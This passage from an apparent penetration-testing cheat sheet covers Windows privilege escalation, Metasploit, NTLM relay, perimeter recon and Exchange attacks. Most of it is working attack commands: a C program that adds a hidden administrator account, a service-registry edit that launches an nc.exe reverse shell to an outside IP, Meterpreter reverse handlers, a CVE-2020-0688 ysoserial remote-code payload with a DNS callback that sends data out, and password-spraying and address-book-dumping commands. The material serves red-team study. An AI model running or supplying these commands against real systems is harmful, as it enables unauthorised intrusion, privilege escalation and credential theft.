upnphost](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-xp-sp1---upnphost) * [https://www.exploit-db.com/exploits/1465](https://www.exploit-db.com/exploits/1465) * [http://www.tarasco.org/security/srvcheck/index.html](http://www.tarasco.org/security/srvcheck/index.html) ### Unquoted Service Paths * [https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths](https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths) [CreateProcessA](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa) function parses an unquoted `BINARY_PATH_NAME` like follows: ``` C:\Program Files\Sub Directory\Program Name.exe -> C:\Program.exe -> C:\Program Files\Sub.exe -> C:\Program Files\Sub Directory\Program.exe -> C:\Program Files\Sub Directory\Program Name.exe C:\Program.exe C:\Program Files\Sub.exe C:\Program Files\Sub Directory\Program.exeC:\Program Files\Sub Directory\Program Name.exe ``` It gives an attacker the ability to inject malious binary into path to be executed with vulnerable service permissions. Enumerate services: ``` PS > Get-WmiObject win32_service | Select-Object Name,State,PathName | Where-Object {$_.State -like 'Running'} | findstr /vi "c:\windows" Cmd > wmic service get name,displayname,pathname,startmode | findstr /i auto | findstr /iv c:\windows Cmd > sc qc VulnerableSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VulnerableSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vulnerable\Vulnerable Service\VulnerableService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Vulnerable Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem ``` Exploit `VulnerableSvc`: ``` Cmd > move pwn.exe "C:\Program Files\Vulnerable\Vulnerable.exe" Cmd > sc stop VulnerableSvc Cmd > sc start VulnerableSvc ...Or reboot the PC if the attacker has SeShutdownPrivilege... Cmd > shutdown /r /t 0 ``` Malious binary example: ```c // i686-w64-mingw32-gcc -o pwn.exe pwn.c #include <stdio.h> #include <stdlib.h> void main() { system("net user snovvcrash Passw0rd! /add"); system("net localgroup administrators snovvcrash /add"); } ``` ### SDDL * [https://habr.com/ru/company/pm/blog/442662/](https://habr.com/ru/company/pm/blog/442662/) * [0xdf.gitlab.io/2020/01/27/digging-into-psexec-with-htb-nest.html](https://0xdf.gitlab.io/2020/01/27/digging-into-psexec-with-htb-nest.html) * [0xdf.gitlab.io/2020/06/01/resolute-more-beyond-root.html](https://0xdf.gitlab.io/2020/06/01/resolute-more-beyond-root.html) * [https://security-tzu.com/2020/11/01/setobjectsecurity-exe-sddl/](https://security-tzu.com/2020/11/01/setobjectsecurity-exe-sddl/) ### wuauserv ``` PS > Get-Acl HKLM:\SYSTEM\CurrentControlSet\services\* | format-list * | findstr /i "snovvcrash Users Path ChildName" PS > Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv PS > reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.16 1337 -e powershell" /f PS > Start-Service wuauserv ...get reverse shell... PS > Get-Service wuauserv PS > Stop-Service wuauserv ``` ### UPnP Device Host Service **CVE-2019-1405, CVE-2019-1322 - Windows 10, version 1803 < 1809** * [https://www.programmersought.com/article/35344126658/](https://www.programmersought.com/article/35344126658/) * [https://github.com/apt69/COMahawk/releases](https://github.com/apt69/COMahawk/releases) ``` Cmd > .\COMahawk64.exe "C:\Temp\pwn.exe" ``` # Metasploit * [https://buffered.io/posts/staged-vs-stageless-handlers/](https://buffered.io/posts/staged-vs-stageless-handlers/) * [https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/](https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/) * [https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation](https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation) ## Cheatsheet Quick handler launch: ``` msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x] ``` Bind RC4 handler through SOCKS proxy: ``` msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp_rc4 msf exploit(multi/handler) > set rhosts 127.0.0.1 msf exploit(multi/handler) > set lport 1337 msf exploit(multi/handler) > set rc4password Passw0rd! msf exploit(multi/handler) > set proxies socks5:127.0.0.1:1080 msf exploit(multi/handler) > run ``` Change meterpreter shell transport: ``` meterpreter > transport add -t reverse_tcp -l 10.10.13.37 -p 9002 meterpreter > transport list msf > handler -H eth0 -P 9002 -p windows/x64/meterpreter/reverse_tcp meterpreter > transport next ``` Automation (about `exploit` options [here](https://github.com/rapid7/metasploit-framework/blob/4049c41ac1b6f12566b055dc5442192072ea5d78/lib/msf/ui/console/command_dispatcher/exploit.rb#L17-L27)): ``` // auto.rc use exploit/multi/handler set payload windows/meterpreter/reverse_https set lhost 10.10.13.37 set lport 443 set EnableStageEncoding true set StageEncoder x86/shikata_ga_nai set AutoRunScript post/windows/manage/migrate set ExitOnSession false exploit -jz ``` ``` $ sudo msfconsole -qr auto.rc ``` Reverse local port `3389` (on Victim, `10.10.13.37`) to local port `43389` (on Attacker): ``` meterpreter > portfwd add -l 43389 -p 3389 -r 10.10.13.37 [*] Local TCP relay created: :43389 <-> 10.10.13.37:3389 $ xfreerdp /u:administrator /p:'Passw0rd!' /v:127.0.0.1:43389 ``` Routing: ``` meterpreter > run autoroute -s 192.168.10.0/24 meterpreter > run autoroute -p Or msf5 > route add 192.168.10.0/24 1 msf5 > route ``` Start SOCKS server (default is SOCKS5): ``` msf > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set srvhost 127.0.0.1 msf auxiliary(server/socks_proxy) > run -j ``` ## Debug 1. [https://github.com/deivid-rodriguez/pry-byebug](https://github.com/deivid-rodriguez/pry-byebug) 2. [https://www.youtube.com/watch?v=QzP5nUEhZeg&t=2190](https://www.youtube.com/watch?v=QzP5nUEhZeg&t=2190) ``` $ gem install pry-byebug $ vi ~/.pry-byebug ... ``` ```ruby if defined?(PryByebug) Pry.commands.alias_command 'c', 'continue' Pry.commands.alias_command 's', 'step' Pry.commands.alias_command 'n', 'next' Pry.commands.alias_command 'f', 'finish' end # Hit Enter to repeat last command Pry::Commands.command /^$/, "repeat last command" do _pry_.run_command Pry.history.to_a.last end ``` ``` ... $ cp -r /usr/share/metasploit-framework/ /opt $ vi /opt/metasploit-framework/msfconsole ...add "require 'pry-byebug'"... $ mkdir -p ~/.msf4/modules/exploits/linux/http/ $ cp /usr/share/metasploit-framework/modules/exploits/linux/http/packageup.rb ~/.msf4/modules/exploits/linux/http/p.rb $ vi ~/.msf4/modules/exploits/linux/http/p.rb ...add "binding.pry"... ``` # Mindmaps * [Pentesting AD](https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png) · [Orange-Cyberdefense/arsenal](https://github.com/Orange-Cyberdefense/arsenal) * [Pentesting Exchange](https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/Pentesting_MS_Exchange_Server_on_the_Perimeter.png) · [Orange-Cyberdefense/arsenal](https://github.com/Orange-Cyberdefense/arsenal) * [Abusing ACEs](https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/ACEs_xmind.png) · [Orange-Cyberdefense/arsenal](https://github.com/Orange-Cyberdefense/arsenal) * [Pentesting Wi-Fi](https://raw.githubusercontent.com/koutto/pi-pwnbox-rogueap/main/mindmap/WiFi-Hacking-MindMap-v1.png) · [koutto/pi-pwnbox-rogueap](https://github.com/koutto/pi-pwnbox-rogueap) * [Pentesting Web Applications](https://miro.medium.com/max/2400/1*8lN7TaTnlZSPEikpHFQnuA.png) · [Chintan Gurjar](https://medium.com/@chintanfrogygurjar/professional-web-application-pentest-checklist-10ae5b2edbdd) # Mitigations ## Network Mitigating ARP spoofing: * [[PDF] Ruijie Anti-ARP Spoofing Technical White Paper](https://drive.google.com/file/d/12V2xbiCZn-YupiGc4mxYWjOmCPFNUss9/view?usp=sharing) ## AD Common vulnerabilities & misconfigurations and recommendations: * [https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/#2-admincount-attribute-set-on-common-users](https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/#2-admincount-attribute-set-on-common-users) * [https://threadreaderapp.com/thread/1369309701050142720.html](https://threadreaderapp.com/thread/1369309701050142720.html) * [https://s3cur3th1ssh1t.github.io/The-most-common-on-premise-vulnerabilities-and-misconfigurations/](https://s3cur3th1ssh1t.github.io/The-most-common-on-premise-vulnerabilities-and-misconfigurations/) SMB lateral-movement hardening: * [https://posts.specterops.io/offensive-lateral-movement-1744ae62b14f](https://posts.specterops.io/offensive-lateral-movement-1744ae62b14f) * [https://medium.com/palantir/restricting-smb-based-lateral-movement-in-a-windows-environment-ed033b888721](https://medium.com/palantir/restricting-smb-based-lateral-movement-in-a-windows-environment-ed033b888721) * [[PDF] SMB Enumeration & Exploitation & Hardening (Anil BAS)](https://drive.google.com/file/d/13msLIywr_Slc00Rv3jue0lkRf7_1O1gM/view?usp=sharing) Antispam protection for Exchange: * [[PDF] Antispam Forefront Protection 2010 (Exchange Server)](https://drive.google.com/file/d/1B-HUcZMZkFjqNs3ckuiiTpYSKdI0EsiR/view?usp=sharing) # NFS * [https://resources.infosecinstitute.com/exploiting-nfs-share/](https://resources.infosecinstitute.com/exploiting-nfs-share/) * [https://blog.christophetd.fr/write-up-vulnix/](https://blog.christophetd.fr/write-up-vulnix/) * [https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe) ## Nmap Discover rpcbind: ``` $ sudo nmap -sV --script rpcinfo 10.10.13.37 -p111 ``` Run Nmap scripts: ``` $ sudo nmap -sV --script 'nfs*' 10.10.13.37 -p2049 ``` ## Mount ``` $ showmount -e 10.10.13.37 $ sudo mount -v -t nfs -o vers=3 -o nolock -o user=snovvcrash,pass='Passw0rd!' 10.10.13.37:/home /mnt/nfs ``` # NTLM * [https://en.hackndo.com/ntlm-relay/](https://en.hackndo.com/ntlm-relay/) * [https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/](https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/) ## Responder Capture Structure `[SMB] NTLMv1 Hash` and `[SMB] NTLMv1-SSP Hash` capture structure: ``` <Username>:<Domain>:<LMv1_Response>:<NTv1_Response>:<Server_Challenge> ``` `[SMB] NTLMv2-SSP Hash` capture structure: ``` <Username>:<Domain>:<Server_Challenge>:<LMv2_Response>:<NTv2_Response> ``` * [https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149](https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149) * [https://ru.wikipedia.org/wiki/NTLMv2#NTLMv2](https://ru.wikipedia.org/wiki/NTLMv2#NTLMv2) * [https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/](https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/) * Andrei Miroshnikov. Windows Security Monitoring: Scenarios and Patterns, Part III, pp. 330-333. ## NTLM Relay * [https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/](https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/) * [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [https://www.secureauth.com/blog/playing-with-relayed-credentials/](https://www.secureauth.com/blog/playing-with-relayed-credentials/) * [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) * [https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/](https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/) * [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) * [https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire](https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire) * [https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/](https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/) * [https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/](https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/) * [https://luemmelsec.github.io/Relaying-101/](https://luemmelsec.github.io/Relaying-101/) * [[PDF] Lateral Movement using Credentials Relaying (taso_x)](https://drive.google.com/file/d/1t8akbdgan7i9Rw0tFEIP223CmHFlTRCH/view?usp=sharing) Generate relay list with cme and enumerate local admins when relaying ``` $ cme smb 192.168.2.0/24 --gen-relay-list out.txt $ sudo ntlmrelayx.py -smb2support --no-http-server -tf out.txt --enum-local-admins -of net-ntlmv2 ``` # Password Brute Force ## hashcat ``` $ hashcat --example-hashes | grep -B1 -i md5 $ hashcat -m 500 hashes/file.hash /usr/share/wordlists/rockyou.txt --username $ hashcat -m 500 hashes/file.hash --username --show ``` Benchmarks: ``` $ nvidia-smi.exe # MD5 $ hashcat -m 0 -b # NTLM $ hashcat -m 1000 -b ``` | Единица хэшрейта | Хэшрейт | Хэши в секунду | |-------------------|-------------------------------|-----------------| | 1kH/s | 1000 | Тысяча | | 1MH/s | 1000000 | Одинмиллион | | 1GH/s | 1000000000 | Одинмиллиард | | 1TH/s | 1.000.000.000.000 | Одинтриллион | | 1PH/s | 1.000.000.000.000.000 | Одинквадриллион | | 1EH/s | 1.000.000.000.000.000.000 | Одинквинтиллион | | 1ZH/s | 1.000.000.000.000.000.000.000 | Одинсекстиллион | # Perimeter * [https://pentest-tools.com/home](https://pentest-tools.com/home) * [https://hackertarget.com/ip-tools/](https://hackertarget.com/ip-tools/) * DNS + `$ nslookup example.com` + Subdomains & AXFR + AS details + $ `whois example.com` + $ `whois 127.0.0.1` + Check for DNS Amplification * CMS, Stack, Vulns + WhatWeb, Wappalyzer + Shodan / Censys / SecurityTrails * Google Dorks + `/robots.txt` + `/sitemap.xml` ## Autonomous Systems * [https://hackware.ru/?p=9245](https://hackware.ru/?p=9245) ### Info via IP dig: ``` $ dig $(dig -x 127.0.0.1 | grep PTR | tail -n 1 | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}').origin.asn.cymru.com TXT +short ``` whois: ``` $ whois -h whois.cymru.com -- '-v 127.0.0.1' $ whois -h whois.radb.net 127.0.0.1 ``` ### Info via ASN whois: ``` $ whois -h whois.cymru.com -- '-v AS48666' $ whois -h whois.radb.net AS48666 ``` ### Search AS * [https://radar.qrator.net/search?query=AS31337](https://radar.qrator.net/search?query=AS31337) * [https://github.com/nitefood/asn](https://github.com/nitefood/asn) Map IP addresses to AS by origin and netname with ignoring potentionally unwanted netname values by keywords: ```bash #!/bin/bash # Usage: whois.sh ip_list.txt for ip in `cat $1`; do ASNUM=`whois $ip | grep -i "origin:" | tr -d ' ' | cut -d ":" -f 2 | tr $'\n' ','` NETNAME=`whois $ip | grep -i "netname:" | tr -d ' ' | cut -d ":" -f 2` if ! echo "$NETNAME" | grep -iqF -e pppoe -e ipoe; then echo "$ASNUM,$NETNAME,$ip" fi done ``` Difference between as-name, aut-num, origin, netname, etc. may be found on [RIPE](https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/@@fullbodyrecursive-view). ## NTP ### NTP Amplification Check: ``` $ ntpq -c rv 10.10.13.37 ``` ## DNS ### whois IP/domain info, IP ranges: ``` $ whois [-h whois.example.com] example.com или 127.0.0.1 ``` ### dig General: ``` $ dig [@dns.example.com] example.com [{any,a,mx,ns,soa,txt,...}] $ dig -x example.com [+short] [+timeout=1] ``` * [https://viewdns.info/reverseip/](https://viewdns.info/reverseip/) Zone transfer: ``` $ dig axfr @dns.example.com example.com $ for srv in `cat dns.txt`; do dig axfr "@$srv" example.com | grep "failed" > /dev/null 2>&1 || echo $srv; done ``` ### nslookup ``` $ nslookup example.com [ns.example.com] $ nslookup -type=ptr 127.0.0.1 $ nslookup [> server dns.example.com] > set q=mx > example.com $ nslookup > set q=ptr > 127.0.0.1 ``` ### DNS Amplification Check: ``` $ host facebook.com ns.example.com $ dig +short @ns.example.com test.openresolver.com TXT $ for srv in `cat dns.txt`; do dig +short @$srv test.openresolver.com TXT | grep "open-resolver-detected" && echo $srv; done $ sudo nmap -Pn -sU -sV --script dns-recursion ns.example.com -p53 $ for srv in `cat dns.txt`; do sudo nmap -Pn -sU -sV --script dns-recursion $srv -p53 | grep "enabled" && echo $srv; done msf > auxiliary/scanner/dns/dns_amp ``` ## SMTP Check if sender could be [forged](https://en.wikipedia.org/wiki/Callback_verification) with an domain user: ``` $ telnet mail.example.com 25 HELO example.com MAIL FROM: <[email protected]> RCPT TO: <[email protected]> RCPT TO: <[email protected]> ``` Check if sender could be forged with a non-domain user: ``` $ telnet mail.example.com 25 HELO example.com MAIL FROM: <[email protected]> RCPT TO: <[email protected]> RCPT TO: <[email protected]> ``` Check if domain users could be enumerated with `VRFY` and `EXPN`: ``` $ telnet mail.example.com 25 HELO example.com VRFY [email protected] EXPN [email protected] ``` Check if users could be enumerated with `RCPT TO`: ``` $ telnet mail.example.com 25 HELO example.com MAIL FROM: <...> RCPT TO: <[email protected]> DATA From: <...> To: <[email protected]> Subject: Job offer Hello, I would like to offer you a great job! . QUIT ``` ### RCPT * [https://github.com/z0mbiehunt3r/smtp-enum](https://github.com/z0mbiehunt3r/smtp-enum) ``` $ ./main.py -d megacorp.com -s 10.10.13.37 -f accounts.txt -m rcptto -o valid.txt ``` ## IPSec ### IKE * [https://xakep.ru/2015/05/13/ipsec-security-flaws/](https://xakep.ru/2015/05/13/ipsec-security-flaws/) * [https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting](https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting) * [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cracking-ike-missionimprobable-part-1/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cracking-ike-missionimprobable-part-1/) * [https://github.com/SpiderLabs/ikeforce](https://github.com/SpiderLabs/ikeforce) #### Get Transform Set Using `ikeforce.py`: ``` $ sudo python ikeforce.py 10.10.13.37 -a ``` Using ike-scan via brute force. Generate list of all transform-sets: ``` $ for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "$ENC,$HASH,$AUTH,$GROUP" >> trans-dict.txt; done; done; done; done ``` Brute force supported transform-sets: ``` $ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M --trans=$t 10.10.13.37) |grep -B14 "1 returned handshake" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt Or (for aggressive mode) $ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M -A -P'handshake.txt' -n FAKEID --trans=$t 10.10.13.37) |grep -B7 "SA=" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt Or $ sudo python ikeforce.py -s1 -a 10.10.13.37 # -s1 for max speed ``` #### Get Vendor Info Get information about vendor: ``` $ sudo ike-scan -M --showbackoff [--trans=<TRANSFORM-SET>] 10.10.13.37 ``` #### Test for Aggressive Mode Test for aggressive mode ON: ``` $ sudo ike-scan -M -A -P -n FAKEID [--trans=<TRANSFORM-SET>] 10.10.13.37 ``` #### Brute Force Group ID If no hash value is returned then brute force is (maybe also) possible: ``` $ while read id; do (echo "[+] Valid ID: $id" && sudo ike-scan -M -A -n $id --trans=<TRANSFORM-SET> 10.10.13.37) | grep -B14 "1 returned handshake" | grep "Valid ID" |tee -a group-id.txt; done < dict.txt Or $ sudo python ikeforce.py 10.10.13.37 -e -w wordlists/groupnames.dic -t <TRANSFORM-SET-IN-SEPARATE-ARGS> ``` Dictionaries: * `/usr/share/seclists/Miscellaneous/ike-groupid.txt` * `~/tools/ikeforce/wordlists/groupnames.dic` ## Exchange * [https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/](https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/) ### GAL #### Ruler ``` $ ./ruler -k -d megacorp.com -u snovvcrash -p 'Passw0rd!' -e [email protected] --verbose abk dump -o gal.txt ``` #### MailSniper ``` PS > Get-GlobalAddressList -ExchHostname mail.megacorp.com -UserName MEGACORP\snovvcrash -Password 'Passw0rd!' -OutFile gal.txt ``` #### OAB Search for `<OABUrl>` node using Burp: ``` POST /autodiscover/autodiscover.xml HTTP/1.1 Host: mx.megacorp.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Authorization: Basic TUVHQUNPUlBcc25vdnZjcmFzaDpQYXNzdzByZCEK Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: text/xml Content-Length: 350 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>[email protected]</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> ``` Or with a Python [script](https://gist.github.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438): ``` $ ./oaburl.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -e '[email protected]' [*] Authenticated users's SID (X-BackEndCookie): S-1-5-21-3167813660-1240564177-918740779-3102 [+] DisplayName: Sam Freeside [+] Server: [email protected] [+] AD: dc01.megacorp.com [+] OABUrl: https://mx.megacorp.com/OAB/<OABUrl>/ ``` Get oab.xml and then gal.lzx: ``` $ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!' https://mx.megacorp.local/OAB/<OABUrl>/oab.xml > oab.xml $ cat oab.xml | grep '.lzx' | grep data $ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!' https://mx.megacorp.local/OAB/<OABUrl>/11ff11ff-11ff-11ff-11ff-11ff11ff11ff-data-999.lzx > gal.lzx ``` Install libmspack: ``` $ git clone https://github.com/kyz/libmspack ~/tools/libmspack && cd ~/tools/libmspack/libmspack $ sudo apt install autoconf libtool -y $ ./rebuild.sh && ./configure && make && cd - ``` Parse gal.lzx into gal.oab and extract emails from gal.oab with a regexp: ``` $ ~/tools/libmspack/libmspack/examples/oabextract gal.lzx gal.oab $ strings gal.oab | egrep -o "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}" | sort -u > emails.txt ``` ### ActiveSync #### PEAS * [https://labs.f-secure.com/archive/accessing-internal-fileshares-through-exchange-activesync/](https://labs.f-secure.com/archive/accessing-internal-fileshares-through-exchange-activesync/) * [https://labs.f-secure.com/tools/peas-access-internal-fileshares-through-exchange-activesync/](https://labs.f-secure.com/tools/peas-access-internal-fileshares-through-exchange-activesync/) * [https://github.com/FSecureLABS/peas](https://github.com/FSecureLABS/peas) * [https://github.com/snovvcrash/peas](https://github.com/snovvcrash/peas) Install: ``` $ git clone https://github.com/snovvcrash/peas ~/tools/peas-m && cd ~/tools/peas-m $ python3 -m virtualenv --python=/usr/bin/python venv && source venv/bin/activate (venv) $ pip install --upgrade 'setuptools<45.0.0' (venv) $ pip install -r requirements.txt ``` Run: ``` $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --check $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --list-unc='\\DC01' $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --list-unc='\\DC01\SYSVOL\megacorp.com' $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --dl-unc='\\DC01\share\file.txt' $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --dl-unc='\\DC01\share\file.txt' -o file.txt $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --crawl-unc='\\DC01\share\' [--pattern xml,ini] [--download] $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --brute-unc [--prefix srv] ``` #### How-To 1\. Use Nmap `http-ntlm-info` to get NetBIOS domain name and Exchange hostname: hunting for hostname pattern prefix if there is one. 2\. Locate DC (guess it trying hostname pattern prefix) and mirror `\\DC01\SYSVOL\megacorp.local\` share with `--crawl-unc` function: ``` $ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com --crawl-unc='\\DC01\SYSVOL\megacorp.com\' --download ``` 3\. Find, xargs and grep for keywords in files: `password`, NetBIOS domain name (for additional account names), hostname pattern prefix (for additional hosts/shares): ``` $ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i -e password -e pass $ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i <DOMAIN_NETBIOS_NAME> $ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i <PREFIX> ``` 4\. (optional) Brute other share names: ``` $ python -m peas --brute-unc -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' mx.megacorp.com [--prefix srv] ``` ### CVE-2020-0688 * [https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys) * [https://github.com/pwntester/ysoserial.net/releases](https://github.com/pwntester/ysoserial.net/releases) * [https://github.com/MrTiz9/CVE-2020-0688](https://github.com/MrTiz9/CVE-2020-0688) ``` Get ViewStateUserKey: Browser → F12 → Storage → ASP.NET_SessionId Get ViewStateGenerator: Browser → F12 → Console → document.getElementById("__VIEWSTATEGENERATOR").value PS > [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$name = hostname;nslookup "$name.0000000000ffffffffff.d.zhack.ca"')) PS > .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc <BASE64_CMD>" --validationalg "SHA1" --validationkey "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --viewstateuserkey "<VIEWSTATE>" --generator "<GENERATOR>" --islegacy --isdebug https://mx.megacorp.com/ecp/default.aspx?__VIEWSTATEGENERATOR=<GENERATOR>&__VIEWSTATE=<VIEWSTATE> ``` ### NSPI * [https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/](https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/) * [https://github.com/ptswarm/impacket](https://github.com/ptswarm/impacket) * `>= Impacket v0.9.22.dev1+20200819.170651.b5fa089b` List Address Books and count entities in every one of them: ``` $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi list-tables -count ``` Dump any specified Address Book by its name or GUID: ``` $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi dump-tables -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type EXTENDED -output-file gal.txt $ cat gal.txt | grep 'mail,' | sort -u | awk -F' ' '{print $3}' > emails.txt ``` Return AD objects by their GUIDs: ``` PS > (Get-ADuser -Identity snovvcrash).ObjectGUID $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi guid-known -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type FULL ``` Dump all AD records via requesting DNTs: ``` $ exchanger.py MEGACORP/snovvcrash:'Passw0rd!'@mx.megacorp.com -debug nspi dnt-lookup -lookup-type EXTENDED -start-dnt 0 -stop-dnt 500000 -output-file dnt-dump.txt ``` ## ADFS #### ADFSpray * [https://github.com/xFreed0m/ADFSpray](https://github.com/xFreed0m/ADFSpray) Spray at autodiscover (NTLM auth) endpoint: ``` $ python3 ADFSpray.py -U users.txt -p 'Passw0rd!' -t 'https://autodiscover.megacorp.com/autodiscover/autodiscover.xml' autodiscover ``` #### adfsbrute * [https://github.com/ricardojoserf/adfsbrute](https://github.com/ricardojoserf/adfsbrute) ## OWA ### Enumerate Users * [https://www.triaxiomsecurity.com/2019/03/15/vulnerability-walkthrough-timing-based-username-enumeration/](https://www.triaxiomsecurity.com/2019/03/15/vulnerability-walkthrough-timing-based-username-enumeration/) * [https://www.intruder.io/blog/user-enumeration-in-microsoft-products-an-incident-waiting-to-happen](https://www.intruder.io/blog/user-enumeration-in-microsoft-products-an-incident-waiting-to-happen) #### MailSniper ``` PS > Invoke-UsernameHarvestOWA -ExchHostname mx.megacorp.com -Domain MEGACORP -UserList .\owa-users.txt -Threads 25 